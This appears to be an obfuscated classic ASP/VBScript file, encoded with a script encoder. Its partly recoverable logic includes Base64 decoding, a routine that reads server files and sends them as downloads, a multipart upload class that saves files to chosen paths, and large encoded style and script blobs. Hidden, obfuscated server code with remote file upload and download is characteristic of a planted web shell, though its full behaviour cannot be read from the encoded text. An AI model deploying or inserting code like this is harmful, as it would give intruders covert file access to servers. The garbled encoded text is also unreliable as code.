oDt~?OnaP*@#@&~P,P9rsPx;hGlOl~zD+dBP;tlMZK;xD+.~,Y4rkZtm.~,Ytbd9lDlBPUM.G!wSPa6ED@#@&~,PPU;sfCYm$HYnkP{P&@#@&,~P,x!DKE2~{P!@#@&@#@&PP,~oWMP;tCD/G!xO+M~',!~PKP&@#@&@#@&~P,~,PO4kkZtmD,xPtk[`(ldn+c?D.k	o~,L.W!w~+LkU~3P/tm.ZKEUOD~~q*@#@&@#@&~,P~,P&0PDtbdZ4l.P{PExrPK4nx@#@&P,~~P,P,x;:9CDl$XDn/,'~U!:fCOmAzYd,O~8@#@&PP,P,~P,Y4kkfCOmP',T@#@&PP,~~PAVk+@#@&~~,P~P,~Y4kd9mYl~x,qU?D.vFS,Am/++cB~Y4kdZ4l.S,\4~rxmDX;GhwmD#~O~q@#@&~P,~P,2U[,q0@#@&,P~P,~&0~Dtb/fmYm~',OqP:tnU@#@&P,~P,PP,3.DcImkd+~+BPEAmd++c9n1WNnEBPEAm[,m4mDmmYD,(x,AC/v*~kYDbUocJ@#@&~~P,P,P~2arDPoE	^YbWU@#@&PP~~,P3x9~&0@#@&@#@&PP,P,~xVDGEaPx~+cPC~xVDW!2~_,Y4kdfCOm@#@&P,~Pg+aO@#@&@#@&~,P~xV.KE2,',C+X`	!DKE2#@#@&@#@&,PP,UMMWEa~xPUYMkUoc,O~SU`	M.G!w#S~r!E#,',x!MW!w@#@&@#@&~P,P2r!Y~x,ZtMcZ~XYcE[_J,[~Hr[vx!DK;wBPqS, #bb,_~{@#@&,P~,P,ZtM`;$XD+cJLCE~LPHb[`	MDK;2~,&BP+#bb,_~{@#@&P,P~~,Zt.c;AzYcr[urPLPHbNvUMMW;wBPXS, #*b@#@&@#@&,~~Pkr!Y~'~d}EOPL~S0OcarEOS,x;:GCDl$HY/#@#@&,~16O@#@&@#@&~,AlknvWf+1G[+,',/6EO@#@&2UN,oE	mOrKx@#@&@#@&@#@&s!U1YrKx,Alk++*KKAjK"`dOMAlknvW#@#@&~~P,fb:~AzOFSP~zY S~~XYnfBP$XDnW@#@&,P,Pfb:,9lDl@#@&,P~~Gk:,rYDlDG.@#@&P,P~ZGUkY~Z4CDtl2~{PJ)$;f3sVu&9FdHgrn5IUPjjp5\l8^9+0T4kN3VsUGw$DkY;\AaHyTFyfclv{0O_zE@#@&@#@&P,~,sGMPbY+MlDGD,'~!,KG~d+xvdYMAlknc*P PqPjOw~c@#@&P,P~~,PP$zD+qP{~&xjDDvZtmDtCwBP\k9`dOMAlknvW~PbOnDmYKD~_~qBPq#*~O,F@#@&,PP~~,P~AHO ~{P&x?DDv/tmD\la~~\bN`kOD~l/*~,kD+.lOGMPQPySP8#b~ PF@#@&,P~P,~,P$HY&P{P&U?DDcZ4l.\mw~,\k9`/D.$lk++cSPrODCYK.P3PfS,F#b~ Pq@#@&~,P~,P,PAHY*P{P(xUY.c;tlM\la~Ptr[`kYMAC/nW~~kDnDmYG.,_P*S,Fb#,R,F@#@&@#@&PP,P,~P,fCYmPx~GlYm~[,ZtM$cAHYF~e~*,_~AHO+yPw~8v#@#@&@#@&~P,~,P~,q6PAHYfP@*'~!,K4n	@#@&,~P,PP,~~P,PGlOl~x,fCYm~[,Z4.~``$zD++PzU9Pql#,eP8v,QP~XO+2Pw~W#@#@&~P,PP,~~2^/@#@&P~~,P~P,~P,P9CDlPx~GlOl,',Z4MAv`kD+MCYKD~e,&~w,cP3~F*P',c$XD+yP)x[~8*bPC~F+#@#@&,PP~~,P~2	[,qW@#@&@#@&P,P,~P,P(0,AzOcP@*xPZPK4nU@#@&P,P~P~~,P~P,9lDl~x,flOC,[~Z4.~`c~XD+&,b	[P2#~e,v*~3PAHO+W#@#@&~~P,P,P~2U[,qW@#@&~P,PHnXY@#@&~,P~Amdv*:W~?K"P{~fmYC@#@&2U[,sE	^YbWx@#@&@#@&@#@&@#@&oEU^DkGx,]+mN$r	lDzobVn`wr^+Hm:#@#@&P,/W	/OPmNPza+AbUlMXP{~q@#@&P,fr:~$bxCDHjYM+Ch@#@&P~jY~AbUmDzUYM+lsP{~ZM+CYr8%mYvEbGrf~ jYM+m:E#@#@&,P$k	CDH?O.l: PHwnP{~mNPHwAk	lMz@#@&P~AbxC.H?YMnlsRranU@#@&P,ArxC.H?ODC:cSGC9sDGhwks+,obVngls+@#@&P,]+mN$k	l.zwkV~',Ak	C.XUYM+C: ]l[@#@&3x9Po;	mYrG	@#@&@#@&v,OR O OO O RO ORO ORR OO RO OO RRO O ORORR@#@&vP`]S,Nn^KN+~OKP.+D.b+-PDt+,WMrobxCV,\Cs!+@#@&@#@&wEx1OrW	P`IJfn^KNn`k/W	\n.D#@#@&~,P~fbh,ljaVbY@#@&P,~PGkhPkr;OaEY@#@&P,PPGrhP&@#@&P~P~(6P(/g;V^`d/Kx\n.D#~K4n	@#@&,P,PP,P`]SG+^W9+~x,JJ@#@&P,PP,~~2XkDPoEU^DkGx@#@&P,P~3	NP(W@#@&@#@&,~,Pv,mKx\DD~l^V~w^EdnkPYK~/almd@#@&,P,Pdr;OaEOP{~IAnJ);2`d/Kx-+MOBPE3JBPJ,J*@#@&@#@&~P,Pv~	+6D~mKx\.OPut6[kLrD/~YK~Y4+~^4lDC^D+.@#@&~,P~m?aVkDP{~?aVrYv/6;DwEDSPr]J*@#@&@#@&P,P~qW~&/)DMCXvlj2^kYb~:tnx@#@&,P~,P,/r!Ya;Y,'~lUwsrD`!*@#@&,PP,~~sKD,q~'~T,YGP`$W!x[cm?wsrD#~O,q@#@&~,P,PP,Pk6EDw;Y,'~d}EYa;Y,[P|@#@&P,P,P~P~~,Z4DvE[_J~',S+WOvljw^rD`r,_,F#BPyb#,[m@#@&P~~,PP,~P,IkT4O`m?aVrYcr,_~F*SPd+Ucm?wsrD`rP3~8#b,O, #@#@&,~P,P~16O@#@&PP,~2	NP&W@#@&@#@&,P~Pi]dfnmK[+,'~d}EY2;D@#@&2	[,s;	mDkW	@#@&@#@&hDr\mYn~UE4,9WSxVKC[sbV`Wksn*@#@&Pi~P,PvR N+^smDnP7CMkC(V/@#@&Pi~P,P9ksPdOMb4kok^+@#@&~7P,P,fr:~dDDok^n2XYnUkkWU@#@&P7P,~,frsPK4Lw?}@#@&,d~P,P9rsPW(%sbV+@#@&~d,P,P9kh~K4%?D.+m:@#@&,dP~~,BRO,dY~m4kWV!Y~0bVnP^W^CDkW	@#@&,dP,~~/DDz4dsrsPxP6rV@#@&~iPP~~EORP1.lOPw?r,W(%+1Y~YKP^4m3,r0,0k^n~+XkkYdPCU9PL+D~wMW2nMYknd@#@&~d,~,PjY,W4NsU6P{Pj+M\n.cZDCYr4Nn^YvJUm.k2ObxLRwrV?zdD+:68N+^Yrb@#@&~iP,PPEO ~m4+^3,YG~k++,r0,Yt~Wk^+,+akdOk@#@&Pi~P,P(W,W4%oUr sbs2ab/D/`kYM)4ksrV#~P4+x@#@&PiPP,~~P,PU+OPG8NsrV~',W8%w?r !Yok^nv/OMb(/sbVb@#@&P7P,P~~,PPERO,0kMdOP1Vl.PO4P.+k2W	/nS,lx[~Dtnx,dY~DtPlawMGwMkCYP4nmN+Md@#@&Pd,~~P,P,P]+d2Kxd+c/Vl.@#@&Pd~~,P~P,~EOR,Y4+P6k^nxm:nPHW;~Tk\~kDPhbssP(+,Y4+~G	+~Y4CY,kd~ktWAU@#@&~d,~,P~,P,BPDW,OtP;/Dd~(XP9n0mEVD~Atx,Y4+z~kl-+@#@&PiP~~,PP~~"+dwKUk+ zN9C+mN.PrZGxD+UO fkk2WkkYbGUJBPrlOYC^4:nxDIP6ksn	l:nxrP'PK8Nsr^+c1ls+@#@&did]+kwGUk+Rz[N_+l9n.PrZKxO+UO SnxTOtr~~G(LsrsRjk.n@#@&~iP,PP,P,~I/2W	/n ;WxDnxDKXan~',Jmw2Vr^mYrW	&W1YnO /Y.nm:E@#@&~iP~,P,PP,?OPK4%?DDnCsP',j+M\+M /DlD+64%n1YcJz9rGA jDD+Chr#@#@&,7,P~,P,PPK4NjYM+C:cr2n	@#@&,7P,PP,~~PEO Pd+O~m/~4bUlMX@#@&,dP~~,P~P,G(LjDDl:cKH2+,'~F@#@&~7,PP,~P,PId2W	/R/tC.U+OP{~J`KoRRJ@#@&~iP~P,~,P~EO PVKl9~k	YGPDtn~kYDC:,Yt~Wk^+@#@&~d~~,P~P,~W(LjOM+lh dWCNw.K:obV`/DDz8/wks+*@#@&~iPP,~P,PPERRPk+	N~Y4n,/ODC:,kU~Dt+~./2W	d@#@&,d,PP,P,~P"+dwKxdncAk	CDHDbOn`K4N?ODnCsR]+m[#@#@&~7,PP~~,P~W(%UY.lsRZ^Wkn@#@&P7P,P~~,PPUnY,W4NjODlsPxPHGDtrxT@#@&,d~~,PP~~,?nY,G(LobVP',1KOtbxL@#@&P7~,PPAs/PBK8%sUrcsrVn3XkdYkc/DD)8ksksn*@#@&Pi~,P~,P,PI/aGxk+ Z^+C.@#@&Pi~P,PP,~~I/aWU/n qDrYcJgW~d!mt~WbVnPab/OkRr#@#@&Pi~P,P3x9P(W@#@&Pi~P,P?O~W(Lw?6Px~gWOtbUo@#@&3U9P?;8@#@&@#@&EMCeMCeCeeCeCMeCeMeCeMMCee,~jaVWm[~PCeCeMeMMCeMeCMeCeMMCeeMMC@#@&Z^Ck/~wk^+jaVKCND@#@&in;8^km,~sbV+k@#@&dhE(Vrm~h1WssK.:AVnh@#@&@#@&7hDr\mOPj!4,ZVm/kmq	kOkmVr"`#@#@&di?+D~ok^+kPxPjnM\nDc/DlOn}4Ln^D`E?1.bwObxTRfbmDrW	l.Xr#@#@&id?OPsmW^oGDs2^+hPx~U+.\.R;DnCD+r8%mO`rj1DraYbxocfb^YbWUlMXEb@#@&dAUN,?E(@#@&@#@&dhDr\COPjE(~Z^ldd|K+.hbxCYc*@#@&id&0P&/}8LmO`wksnk#P:4+	@#@&i77sbV/ InhK\nb^s`*@#@&7id?nO,srVd,'~gWDtk	o@#@&di2UN,qW@#@&dd&WP&/r(%nmD`smGVoGM:3Vh#,K4n	@#@&77i:^W^oKDhAV:R"+sG\bsVv#@#@&iddUnY,:mKsoWM:AVn:~x,1GY4rxT@#@&7i2x[~&0@#@&i3	N~UE(@#@&@#@&iKE(Vrm,n.Ga+DDzPV+Y,oGDs`kqUNna*@#@&dioWM:~x,JJ@#@&id(0,h1WswWM:2^+s 2XkdYk`J/m/+vdq	N+XbbP:tx~sG.sPxPs^W^sG.s2VnhcqO+scdZCk+v/q	Na#*@#@&dAx[~hDWanDDX@#@&@#@&dhE(Vrm~90CE^OPUE8~`wVGC9`b@#@&7ifrsP(kfmYmSPkqUw!YHCs+@#@&7dGk:,UKWkAorxS~	nG/AUNBPUKK/~~-GlOl~G!x[k~,xfmYm$W!x[nK/@#@&idfbhP	nWkorV~,xKWd$KEUN@#@&@#@&d78bflOC,'~I5!+dDR~kxmDH]+mNcI;;nkYR:GYmVAHOn/*@#@&d7xKGkAnobUP{Pq@#@&ddUKK/3x9~{P(	/DDAvxhG/~+Lk	~~8bflDC~,ZAHOn?DDbxL`/4M`q&*b#@#@&@#@&idqW~vxKWk3	NR	nK/AobU#,@!xPZPP4xPAakDP?!8@#@&@#@&id-fCOmAGE	[/,'~\bNAc8bfCYmS,xKK/~+obxB~xhWd2	NRUhW/~nobx#@#@&7d	fmYCAG;	NKWk~',qUdDDAcqBP8kGCDlS,\GlYmAK;x9/b@#@&@#@&7ifW,ixDkV,U9lDl~W;x[KK/~',(xkY.$v4k9CDlSP79mYC~W!xNkPL~Z~XO+UY.r	o`rROr##@#@&@#@&idixKWd~{P(xkOD~`U9mYl$G!x[nKdBP8bfmYlBP;$XD+jYMkULvJZKUYxY 9r/aWkkOkGUr#b@#@&7dixKGkP'~(	/OD~c	nGk~,4kGlDC~,Z$XD+jOMkxTcJ	l:xE#*@#@&d7dUKK/$+Trx,'~UhW/~Q,v@#@&i7ixKK/AxN,',(xkY.AvxKGkA+TrxBP4b9CYm~,Z$XOnUY.k	L`;t.c2c#bb@#@&7did&x2!Ygl:P{~Zqk[+UY.r	o`trN~`4b9CYm~,xKWd$orxB~xhWd3	NOUKK/$+Tr	#b@#@&idd	nKdsbVnP{P(UkYD~cxGlYm$GE	NhWd~~8bfCYmSP;AzO?Y.r	ocJ6r^+Um:'J*#@#@&didUnK/$G!xN,xP&x/D.$`	nK/3x[S,4rfmOlBP-9mYl$G!x[/*@#@&@#@&idiq0,xhG/wks+,@!@*~ZPb	[P,xnKdok^+,@!~xKGkAGE	[P:tnU@#@&d77ifr:,G`wsKl9sk^+B~/wks+glhn@#@&di7dU+Y,Giw^WmNoksn,'~1AP`wsGmN+[obVn@#@&@#@&d7id	nWkALk	PxP	nGdwkV~_,F!@#@&7did	nG/3U9PxP,(xkY.$vxnGd~+Lk	S,4rGlDl~,Z~zY?ODbxLc;tDvfc*##@#@&7didksrVnHm:nP{~Zqk[nUYDrUT`\k9$v4rGlDl~,xhG/~+Lk	~~UhW/AUN xnKd$+Tk	#b@#@&7id7W`2VKl[obV+ obVn1mhPx,IbotD`kok^+Hls+S~d+xvdsbV+gCh+*O&xjY.]\c/wrV1Ch~PEwr#b@#@&@#@&d7id	nWkP{~q	/OD~`UKK/2	[~,4kGCOlBP;AzYnjDDrxTcJ;WUOxYRPHwn)rb*@#@&ididxhWk$+TkUP{PUKK/P3~FW@#@&i77d	nK/3x[~{P(xkOD~`UKK/AnLbxSP(rGlOm~,ZAHYjYMkUovZ4.vF&*b#@#@&@#@&77diW`wsWC[wks+c/W	YnUDKX2n,'~Zqr9+jDDbxovHb[Av4rfmYCS,xnKdAok	S~xhWk2UNRUhWdALk	#b@#@&@#@&77idUnKd~+Lbx,'P	nKd2	NQc@#@&77idxhG/AxN,x~q	/DD$`UKK/$+TrxBP8rGlYCS,\9lDC~W;	Nk#P Py@#@&id7dKj2sKlNwrVRsbsnfmYmPxP\r9Ac4b9lDlS~	nWd$orxB~	nGk2	NO	nKdAorx*@#@&@#@&ddi7q6PW`2sWmNwks+ obVn?b"+,@*~T,KtnU,srVdcb[9PdZlk+vdq	w;Yglhn*~PKiw^Wl9orV@#@&d7d3sk+@#@&i7dixKGkP'~(	/OD~c	nGk~,4kGlDC~,Z$XD+jOMkxTcZ4D`8fb#*@#@&d7d7UhWdALk	Px~	nWd~3P*@#@&7id7	nK/2	N,xP&xdYMAcUhW/~nobx~,8rfmYm~~\9CDl$W!UNk#~R, @#@&7id7q6~gWO,:1WVwWMh2^+hRA6rdD/`d/lk+`k(Uw!Yglh+bb,K4+	~:1WsoKD:3s: b9[,S/m/`/&xa;Yglh+*~~/qkNjYMkxTc\k9Av4rfCOm~~xhG/~+Lr	~PUKK/3x9R	nGkAok	#*@#@&id72	N~(6@#@&@#@&didxGCOl~W!x[nGd,'~q	dYMAcUGlYC$KEUNhGkPQ,SxAv\GCYmAGE	NdbBP4b9lDl~,-9lDl~W;x[d*@#@&diJWKw@#@&i2x[~UE8@#@&@#@&dKMk7lYPw;x1YrW	P/$HY+UODbxovdjYMk	ob@#@&7ifr:,Uq	Nna@#@&d7oKD~x&U9+a,',FPDW,J+	`d?DDrUT#@#@&7d,PP;$zY?DDrxL~{P/AHO+UY.r	oP'~;t.Av)km$vHbN`k?D.k	oSx&x[nX~F*b#@#@&diHn6D@#@&d3x[~wEUmDrW	@#@&@#@&dn.r7lO+,o!x^DkKxP;b[+UY.k	oc8k?YMrxT#@#@&77fb:,x(x[nX@#@&di/bNnjDDkUL,'EJ@#@&idoKD,xq	NaP{PqPDW~JxAv8/UYDbUL#@#@&id~P~/qk[+UODbxL~{PZ	r9+jYMr	o~LP;tDvbk^AvHrN~`8dUYDbUoBxq	[n6BF*#b@#@&7i1n6D@#@&i2U[,sEU^DkGx@#@&Ax[,Z^l/k@#@&@#@&;VC/kPi2^Wl9nNwkV@#@&dhE(Vrm~/KxO+	OKHwn@#@&dn;8^k^Pwr^+Hm:@#@&in!8Vbm~sbVn9mYl@#@&@#@&dn!8sk1PhDGwn.DX~MOPwksnUkync*@#@&diobVnUk.+P{Pdnx~`ok^+9CDl#@#@&dAxN,K.Wa+MYz@#@&@#@&dKE(sk1Pj;(P?C-KGfbd0`dhlDt#@#@&i7W	PnDMW.~M+/!h+,x+XO@#@&idGkhPGoU~~WwrV~~U&xNna@#@&@#@&i7&0~knmYt,',EJ,r.Pwksngl:~',JJ,P4+	PA6rY~j!4@#@&i7q6P\r9`/KCDtSPdn	`dhlDt#*P@!@*Pr-EP:tnU,/nmOt,'PkKCY4PLPE-E@#@&@#@&dij+DPGoUP'~jD-+M ;DnmYr4N+1O`r?^DbwOr	oRwrV?XkOn:}4N+^YEb@#@&7d&WPgWO~Ks? oKV[+M3XkdD/v/nmY4bP:tnx,2arDP?!8@#@&@#@&i7j+DPKsrVn~{PGsU ZM+COK+aOwks+vdhlO4PLPsbVHls+SP:D;n*@#@&@#@&disWM~Uq	N6~'~q,YGPdnx~`or^+fCOm#@#@&i7,P~,WwkVRq.kD+~Z4Dc)kmAv\k9A`wrs+GlDlSx(U9+a~8b#*@#@&7i1+aO@#@&@#@&i7Ksr^+cZVK/@#@&i2UN,?;8@#@&@#@&7n!4Vb^~?!4,?C\nPKfCYm8lk+c$HI+W~Ksr+^[*@#@&id&0Pd+	$`wks+GlOC*P',TP:t+	~36bY,?;4@#@&@#@&7d&WP&/68N+mOcKsr+^[*PP4+	@#@&idiGsb+sNcb22xN;4E	3Pwrs+GlDl@#@&77Ax[P&W@#@&d3U9P?;8@#@&@#@&AU9P/^lk/@#@&@#@&WE	mOkKx~iaVWm[`^WmmOrW	#@#@&7frh,j2VKCNDS~wkVn@#@&dj+D~`wsKl9+D,',H+SPok^+i2^Wl9nD@#@&@#@&7iw^WmNnD iaVGl9c#@#@&@#@&iq0~iaVGl9nMRobV/R;W!UY,'~!,K4n	@#@&i7I/wKUd+cMkO+~E@!K]@*@!Pf,msCk/'EE04.YsEr@*obV`/*P	GY,E2VKl[n9R@!JPf@*@!z:]@*J@#@&i2s/n@#@&d7sK.PAl^4,sksn,qUP`2^WC9+MRsbVdR&Yn:k@#@&7idsbs+c?l7nPWGkk3~j2sKl[+M :1WsoKD:3s: qDns`E^W1lYbW	E#@#@&@#@&id7r6P2M.RgE:(n.@!@*!,Y4+U@#@&d7di]+kwGUk+R	.bYnPr@!:I@*@!KGPm^lkd'rJV4MYhEr@*sbs+,jw^GCNN=PEP'~wks+cok^+HCs+P'~rPlPr@#@&d7id"+/aW	d+c.kD+~Ewlk^nN,`J,'~2MDcfn/^.bwOkKUPLPEb@!zK9@*@!zPI@*E@#@&7idi2DMR;s+mD@#@&id7n^/+@#@&didd"ndwKxk+ .rD+~J@!PI@*@!P9,mVCdk'EJ08MYhrJ@*sk^+,iw^WCNNl~rP[,iw^Wl9n.RsmKVoW.hAVn:c(Y:cE^WmCObWUJ*~LPobVRsbVHls+~[,J@!8M@*J@#@&didd"ndwKxk+ .rD+~JUry)~E,[Por^+ sbs?r.+,[PrP(zY/@!z:f@*@!JKI@*E@#@&ddinUN,k6@#@&@#@&7i1n6D@#@&i2U[,q0@#@&@#@&7jasKl[,',jw^Wm[+MRhmKVoGM:2^n:cqYhcJ^k	38l^Vr#@#@&UN,0;U1YkGU@#@&veCMCeMCeCeeCeCMeCeMeCeMMCPP`2VKlN,~MeCeCeMeMMCeMeCMeCeMMCeeM@#@&@#@&BCMCeMCeCeeCeCMeCeMeCeMMCeP,oE	mRmd2P,eCeMeMMCeMeCMeCeMMCeeMMCe@#@&@#@&@#@&vCeCeeCeCMeCeMeCeMMCeeCMeCPPsn[kmRm/2P~MCeMeCMeCeMMCeeMMCeMeCMCe@#@&@#@&NksPk^DbwO~,khL|VWm[k	o~,rho|NbDSPrhT{s\`2~,khL|Y6OS,kho|rsoS,kso{!x0UWS~~:NrC|/YHs+@#@&@#@&hnNbl|/OXsn,'~Jr'{@#@&Ees,3npk|/841:[a4NWh1CT{ZTVh4y*TJo1!	6^r:l-^:8t(fd|/	\\8x5OmyVt:W6\p~c6hKBI 1k42qv&!\!I0}!IN/F/q}\(UpD}:wOCX*}VtV^h"t8:Adpo92eqhG/L^keg.\&B7Nq*3dg-4V,zrbH"e:1tt+2FZo^"e&x\(Makep&Yt:w%}UF%8y6\^%Ko(ytAty).HG/|;(g%ms,d4V94^bFWm	NK4M^UCC5YI 1/8f&vEPLm@#@&J(/tF}9#01	pF/TV"I&x\4V6be(&Y^ 4tt!O&SqH\(M,H6rbNH:qaH%3HrAWx^ gX8+X/5hoHSP108VVUmC5Y5y,k8&&v(ZtyePgtHy3G;oV.ef974V6r5p(D5p9H8&1Ye+O/4f(+q/HltGVV}5GZTV.e&x\8MXkep&YN_BtI /De+,k42qq/\.5P14\ AG/L^y5fB74!6beoqO\MwXl21Ke"\[X8L8+X\mNGo&y14\+2.5:/F0}GnJ~[|@#@&rZU]0+hGB\:1E9/8y[_Vk}KaE(f9D5	hFZLss4 lTSo1whivtKwhnfdF;H\(!,HrrHVI3t!"3eG;L^:8y*ZS\t(	Vk+Pwq}pB05l4SAsXm	o/}hK9CM#2\ 4!}rbH1u$Wrh21;o2tAK9ey,k4&&v&T.wIi.wIPdnZ("s+_pY\!#L(&xt[Ms-(L2E(+*^rAGx}:1;9ZqympaV6N2SmCTG;LVs4+*ZSp[^l9GNGwk(+a3}hK9[:#zrP'{@#@&J9Ms%IhOeq62}y*+N!jc9ZFZ42)G;xT|;:3mM,yt(xGZTs%4y67m%W%HGA4HV#L}h21;ow46	}2mysZ}	"G;oVN4ya\1LGL"j#o"j.w6ha,ZT24r	}am+VTtqplV1 \(B{;oV%8y6-mNGN19~ttM.NrS2,;o2!\(4TI(9^e(k|ZqB45yY	mh,q8spq.3XtK(atL/F/q1-4V1HrrgM"3}VI0eG\:1E9ZqhIFa8C0v.s#z}Vs!5j6$E,[m@#@&EmsV48G/|/	\\8x5O1 s+}:W6t(~*rSWBNs.z[VVLI	hD5X2t Wv(s3t!XV6XzFZqtsCqNW[9K66fkF;B7msIV1k8d}q}TrNsAn;Ay(+6a}Zz%\K&6tL3X6AK9e:Oz}V.zJo9wt+4!6LwAZ$.4y6w\Zz%1qpq}G.V6SW9Ih,H}MjzJx\9C]\8PK6^CTLmy,dCqpo("j3H5q\fdnZq9\1:"smbFT42b\oAc&u174M^V(Zt6tL3XE~L{@#@&r\K&G/UZ|Zhs!mu.Z(;6"\XV52IF/o^kegDtfx\NqX3}kH.\9HSH.b{ZLsN4+67^LKL]V\MIVtVrAWxts,;9Z8:5qFa8C0v#:jXt!wE5UaA1:V489/nZq}-4U}Dm+V+tKK6\p~crAGxNh.H[VV%ISY5q6at Wv8^3t!XVrSG9mM.at+tZrNqTrz)nZ	97^:"V^r8/}	tZr%sSn;A"( Xw};bNH5Ftfj36AK95s1X\M.HJp9a}ytTJ~'|@#@&J}%sS+/$.4 a2\Z)LtP&6\N2HrhK9Ih,H}!.HS	B7NC"-4:W61uLo1 O/C}L&y3XtPqXH%dnZB-1:]V1r8!82b+H(~c&u174!V0q/\8}fjV1qpG;UT|;:^E^C#Tdx4Lm!.Nlz$FZosVm(Hh(!w*6bAb4MOLm"/nZ	t^l	[KNfKLHN9h9d|;(9wtC]G}k)XtUAWrAGxmMoV\MsE\"Ko\G/nZ8t1hNa4%WTH9dnZx-msIV1%Gotfk|EP'm@#@&E05G|d:Or1xIOnSWB5soNl+9X(&.!}GGLty)ytf\A}hWxe O/42(qZ}VIV}!]N/FZqt\(x}O\:sOCq6Xr^t^mh"t(:2kpoBwIAG;osh( *ZJ(gw+siH:sS+9/F/o}sm	]wI oddsdCqN;rsqa}!"/\K/nZq4Vm[W9fGzgf/T/o^k42BV}oqD4!.h[GWam_Lo1 1dmpL(..V1q}8}9k|;97ms]V1kqXm[G9fWX^CTomy1dlqpTJ~[m@#@&J(yAzH:qa\N/|/	x\^:"s1kqb42I!( ZHoA*q_1-8VV3&/HXHLAz\K&G;osk8fx3t(&ONV,A6Nshn/~y8 X2\Z)N1qpF\fjVrSw1ZTW;Cy9X9!!X+hKBe:wLm [X8fjEtfK%H.b"\GHh6AK9e Od(&(+qZ}M"3\!IN/FZq}-8	pY\hsDlXX6V\V1:]t8hA/}(x25qh{/TV:8+l!J(g2:i+H:shfkFZo}sm	I2eys/d	skl9;6:8wrP'{@#@&r}!IktKk|/	4Vl	[KN9W.\G/L;o^k4290t(&Y8Mj:[9K6m_Lo1 ,kC	pTq..V1	}8}9/n/x\^h"VmrqHl	NK[GWa1CTomy,kC5o(yAX\P&6HNd|;97^hI^mbFr4f]Z4+!+\(~c(ug\4!s0q/HX\N2ztK&GZTVb8&x3t(&Y[!OhrNohZA.8+6a};b%1	}8}9.06ha,/LKEl+BHN!!X(Vs{;o^L4y67^La\^:wEt+`GZTs!\(tZJ	I^J,[m@#@&EI 1XIpIa4+*+4:1;\Kd|;	\\8	pDm ^v\PWXHpAWrAGx}:O;N;F&\	sxmC5ve:1d\fd|;p}^mU]a5 oddo/m	9E6	I^+C5Y(	V0}!6^rA2OZoK;ly9X9!T6&MAv[:s"m(]V\u/nZ	H74M1z}:1XI	lxt:/n0pK|dhYbmUIDHj$4r:4-Ns.XAG9I O/8&(&y}hIPA^5"dn0pGFd:Ok1U"Y\UA4rx\w1+VZ}	p+l!1y}(x{ZTVL(+a\rPL{@#@&E^NW%1G$ttM#%}hw1/TW;}sX44	`ohWxNys39MLvgf)s}hwO/oKE}	H2+sjT+AWB[yVVNVLvgXi{;x!F/b*hN_sS}j~G;oV2lq]!mfG*xKdF6pWnJ:\35o]sq_/nZpN2t_IGrN3yxKdF6pWFJs}%4yqD5	l3&C/nZo[w\C]W}L^s}hwO/oKE}sHG}q1Mqu/F/oN2}_]W}L}s}hw1/TW;}soNN!^\(kAFZTs&m]!mfGa}ZjF/xZ|ZbXTJ,[|@#@&Je	x/tj4s5qpLnSW9ehwLC 9z(&#!};FL( X-mNWaHN2z\:qG;LVK}^UCC5vtLiG()a,/oK%}ysA\_/|/	"w^&~dI(V+4s,E\KkF05WFqy,+to9/IpVFZo^VC(gh(Mo*6hl\8:`{ZTVJqVEt!jc6kz*tfdnZoA\1 ^Tlq,;rbA4e	1\(u.Z}KkF/("\1fGo\9k|/Xs}	p(GbG/L^&C"TmfGTH:bhxKkFZqtslqNG[GWotPbS9KkFEPL{@#@&EZ	B45+Y	^:OF8h5Y5+1k4fq+(;HAtfzGZTV7^MwLC("*6%zE1Gd|;}a8uI^mNw44u$K5jt7^MwLCp"*nP}S|P/nW5WF;kg!5s6t8 w3ClxJ/zLNVB/:sS]u9aNs.zqudnZ	Ia^&~/ep0v4h1!}P/n/oWOml3}oo+(f0h6hK9^!Oylo]w( c+thVW}qp{ZLs6m!,.C("w8+Wv5	B.4+68[Vj{;o^!42b+HKzV6X~/t	\!rNihxK/nE~[|@#@&J/q41:[w(%WD1P$S+Z$49(]\&!wF[V%TSKAhtuAWrAWx(f]7mfas+_AX\pHymOEFM]-I&#Y\	*ZShB7}CV;1 HX(+X/#V,S|X43(+184	.!N/Xb4 "XSs1/m	#E924VC[G9Zq!m!V.ShHkl#;924Vm	9W[;37Hk0G9!.WN/F44!s	4La%}q*!\p(G;xZ|/kHTI:a1\	*8qudnZ(GOmX3\pTv(GmSrhK91!,.lpIa4+*+}:^*}qpGr~'{@#@&rZLVW^V,"lo]w( *I9"8y6qNViFZL^!(&b+HbiG&MaV\x}gKb^6hK94qoz}yV!rr!q\_A*qVoF9M0LI(.T8HbOH:)SmuTG;oV6NV1h}:#c1CBs1&1a8 WW}V1%NqF^4Up;es,V+UXyI&B-(M6i82b.|V]75fjY\*ZSsB\\CVEI a2\*ZjMjw}y4TSoIKlpH;ey62}qX!UM#2\ tTFU%qH;VFN!jc9ZF44Vsx(L2L\XT\(qF/xZ'J@#@&@#@&kmMk2Y~x,JEPLm@#@&J[hwXq!s.?ijOJHw)I g04yc4}ZK\t:w/^+`GSH19"?A0tpI^52I-mL2y5pqT8Mwy[ojX4/)Oq/mN]otA(MOX}o9RpsSx6ha ep&o4Voy9s.H83945yYqm/)Oq/mN](4h8!OX}pBR(oh	6Sw+I(&o52.H^:jE[sOF^hSonU)xxy/n[hsHqV1qmUB^4UI6^xjE8h^E}z)Oq!}48_1s}ha 5oqTt:^V8M5oKjzx9.d|9:sH(!V!NV.zNhokJ~[|@#@&rq9TT9X^{;xtt1r~W[_ISqfZoIf9^5pI^jh#XNj"NA,kmh#L9ZTw6h2+I((o\h}tlpHZqfTL(x#/(9k|[ssHqMXy9o9^mfA74UH^qfZL4	./(9d|9:wX(Mo%9Ms\(s9^mf$74xHs&fTo(Uj/8G/nN:wX&!.WNo,Z}p4ZqfZL9H*!u}EI(ghJ:o"1CLE1!tSShHs4?X51XXL(+l:Cqm!lC"YdhtZ4	h!+!qkS:g"mH*w(hVEI:w!J:HOrP'{@#@&J\ZX%1X*+eb*4m2L!l	lLd:s.5UXt1 ocd:o"I&o!8MOxSb^{Z	}4mrAsn_IWlqqx&fTLxX*5^Vm;l	$^Shah\m!mVXxd:[w\kXA(:m![M^:}bXr4ob!9"/F[sszqVsY\F1d( sVCq*UqGTT4Uj/(f/nNsoX&MsY\F1+m.2(fZo4	#d4G/nNhsz(_14Ns#jmqs1kb1(Gb{Z	t4mr~h(&1:j`Aoh?)h}h2+I(qT^MOyIo4AqG!TH9/FE,[m@#@&ENssz(V*\]h^/t?z1&f)FZ	}t1k~;4Z}-4VIs^bb,&9bFZoaP[Cxw(:^E^ux\[MOT+oAsJ	IXC	ZoK?~h9XNNVV\(kT2q_/FZo9s[_.X(rAZlM^"JxxV1Mate+`WJFl^mHY0p_HDB/OxJZ&rnKdn05W|`&"zlq*US	